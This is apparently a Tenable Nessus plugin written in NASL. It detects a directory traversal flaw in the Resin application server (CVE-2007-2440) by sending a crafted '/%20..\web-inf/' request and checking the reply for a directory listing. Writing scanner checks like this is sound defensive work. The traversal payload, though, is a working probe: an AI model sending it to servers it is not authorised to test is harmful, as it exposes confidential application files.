#
# (C) Tenable Network Security, Inc.
#


if (description)
{
  script_id(25241);
  script_version("$Revision: 1.5 $");

  script_cve_id("CVE-2007-2440");
  script_bugtraq_id(23985);
  script_xref(name:"OSVDB", value:"36058");

  script_name(english:"Resin Directory Traversal Vulnerability (2)");
  script_summary(english:"Tries to get a directory listing of web-apps\ROOT\WEB-INF");

  desc = "
Synopsis :

The remote web server is prone to a directory traversal attack. 

Description :

The remote host is running Resin, an application server. 

The installation of Resin on the remote host allows an unauthenticated
remote attacker to gain access to the web-inf directories, or any
known subdirectories, on the affected Windows host, which may lead to
a loss of confidentiality. 

See also :

http://www.rapid7.com/advisories/R7-0029.jsp
http://www.caucho.com/resin-3.1/changes/changes.xtp

Solution :

Upgrade to Resin / Resin Pro 3.1.1 or later. 

Risk factor :

Medium / CVSS Base Score : 5.0
(CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N)";
  script_description(english:desc);

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2007-2008 Tenable Network Security, Inc.");

  script_dependencies("http_version.nasl");
  script_require_ports("Services/www", 8080);

  exit(0);
}


include("http_func.inc");
include("http_keepalive.inc");


port = get_http_port(default:8080);
if (!get_port_state(port)) exit(0);


# Make sure the banner is from Resin.
banner = get_http_banner(port:port);
if (!banner || "Resin/" >!< banner) exit(0);


# Try to exploit the flaw.
req = http_get(item:"/%20..\web-inf/", port:port);
res = http_keepalive_send_recv(port:port, data:req, bodyonly:TRUE);
if (res == NULL) exit(0);


# There's a problem if it looks like we have a directory listing.
if (">Directory of / ..\web-inf/<" >< res)
  security_warning(port);
